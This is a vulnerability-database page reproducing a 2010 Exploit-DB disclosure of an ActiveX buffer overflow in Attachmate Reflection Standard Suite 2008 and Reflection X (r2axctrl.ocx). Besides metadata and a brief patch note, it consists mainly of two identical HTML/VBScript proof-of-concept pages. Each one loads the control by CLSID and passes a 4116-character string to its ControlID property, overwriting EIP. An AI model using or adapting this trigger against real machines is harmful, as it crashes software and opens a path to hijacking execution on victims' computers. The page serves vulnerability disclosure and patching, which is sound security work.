Attachmate Reflection Standard Suite 2008 activex buffer overflow

vendor:

Reflection Standard Suite 2008

by:

Rad L. Sneak (JB)

8,8

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Reflection Standard Suite 2008

Affected Version From: 13.0

Affected Version To: 14.0

Patch Exists: YES

Related CWE: None yet

CPE: a:attachmate:reflection_standard_suite_2008

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WinXP SP3 & Win7 64bit

2010

Attachmate Reflection Standard Suite 2008 activex buffer overflow

Attachmate Reflection Standard Suite 2008 & Reflection X Both contain a buffer overflow that could be triggered via activex. when r2axctrl.ocx is sent large string to the Reflection for UNIX & OpenVMS control class a crash happens that overwrites EIP with 41414141.

Mitigation:

Apply the latest security patches and updates to the affected software.

Source

Exploit-DB raw data:

# Exploit Title: Attachmate Reflection Standard Suite 2008 activex buffer overflow
# Date: Mar 11, 2010 found
# Author: Rad L. Sneak (JB)
# Software Link: http://www.attachmate.com/Evals/ruo2/eval-form.htm
# Version: 13.0 & 14.0
# Tested on: WinXP SP3 & Win7 64bit
# CVE : None yet


Attachmate Reflection Standard Suite 2008 & Reflection X Both contain a buffer overflow that could be triggered via activex. when r2axctrl.ocx is sent large string to the Reflection for UNIX & OpenVMS control class a crash happens that overwrites EIP with 41414141. 


# Code : [PoC exploit below]
______________________________________________________________________________
<html>
PoC1
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:15B168B2-AD3C-11D1-A8D8-00A0C9200E61' id='target' />
<script language='vbscript'>

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\ReflectionsX\r2axctrl.ocx"
prototype  = "Property Let ControlID As String"
memberName = "ControlID"
progid     = "R2AXCTRLLib.R2winCtrl"
argCount   = 1

arg1=String(4116, "A")

target.ControlID = arg1

</script></job></package></html>

___________________________________________________________________________________
May need to throw a refresh to trigger PoC2 completely
__________________________________________________________________________________
<html>
PoC2
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:15B168B2-AD3C-11D1-A8D8-00A0C9200E61' id='target' />
<script language='vbscript'>

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\ReflectionsX\r2axctrl.ocx"
prototype  = "Property Let ControlID As String"
memberName = "ControlID"
progid     = "R2AXCTRLLib.R2winCtrl"
argCount   = 1

arg1=String(4116, "A")

target.ControlID = arg1

</script></job></package></html>

___________________________________________________________________________________________